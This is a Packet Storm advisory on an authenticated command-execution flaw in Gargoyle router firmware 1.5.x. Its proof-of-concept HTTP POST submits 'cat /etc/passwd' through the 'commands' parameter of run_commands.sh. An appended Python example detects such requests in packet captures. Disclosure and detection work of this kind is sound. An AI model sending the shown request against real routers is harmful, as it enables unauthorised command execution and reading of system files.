Gargoyle 1.5.x Command Execution

2015-06-04T00:00:00
ID PACKETSTORM:132149
Type packetstorm
Reporter Provensec
Modified 2015-06-04T00:00:00

Description

                                        
`# Affected software: Gargoyle router management utility
# Type of vulnerability: code execution
# URL: http://www.gargoyle-router.com/
# Discovered by: provensec
# Website: provensec.com

# Version: 1.5.X (Built 20140215-1506 git@505e8dc)
# Proof of concept  
  
  
Vulnerable parameter: "commands"
  
POST /utility/run_commands.sh HTTP/1.1  
Host: 192.168.1.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.1/time.sh  
Cookie: browser_time=1433405406; hash=090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64; exp=1433406276
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: multipart/form-data; boundary=--------108192589  
Content-Length: 418  
  
----------108192589  
Content-Disposition: form-data; name="commands"  
  
  
*cat/etc/passwd*  
----------108192589  
Content-Disposition: form-data; name="hash"  
  
090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64  
----------108192589--  
  
##screenshot for output: http://prntscr.com/7ckcqd  
  
  
And yes, it requires authentication.
`
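For reviewing proxy or packet captures, the following added example (not part of the original advisory and not Gargoyle code) parses a raw HTTP request and flags POSTs to /utility/run_commands.sh that carry a "commands" form field, returning the submitted command text for triage. The function names, the sample request and the reading of the "hash" cookie as the session marker are assumptions made for illustration.

```python
import re

# Endpoint and field name as they appear in the advisory's request.
ENDPOINT = "/utility/run_commands.sh"
FIELD = "commands"

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def form_fields(headers, body):
    """Return {name: value} for each part of a multipart/form-data body."""
    m = re.search(r'boundary="?([^";]+)"?', headers.get("content-type", ""))
    if not m:
        return {}
    fields = {}
    for part in body.split("--" + m.group(1)):
        part_head, _, value = part.strip("\n").partition("\n\n")
        name = re.search(r'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1)] = value.strip()
    return fields

def inspect(raw):
    """Return a finding dict if the request submits commands, else None."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.split("?")[0] != ENDPOINT:
        return None
    fields = form_fields(headers, body)
    if FIELD not in fields:
        return None
    # Assumption: a "hash" cookie marks a logged-in session.
    return {"path": path, "commands": fields[FIELD],
            "has_session_cookie": "hash=" in headers.get("cookie", "")}

# Constructed sample request (benign command, placeholder cookie value).
SAMPLE = "\r\n".join([
    "POST /utility/run_commands.sh HTTP/1.1", "Host: 192.168.1.1",
    "Cookie: hash=PLACEHOLDER; exp=0",
    "Content-Type: multipart/form-data; boundary=XBOUND", "",
    "--XBOUND", 'Content-Disposition: form-data; name="commands"', "",
    "uptime", "--XBOUND--", ""])
```

A non-None result on a capture is a record of commands submitted through the web interface and is worth correlating with who was logged in at that time.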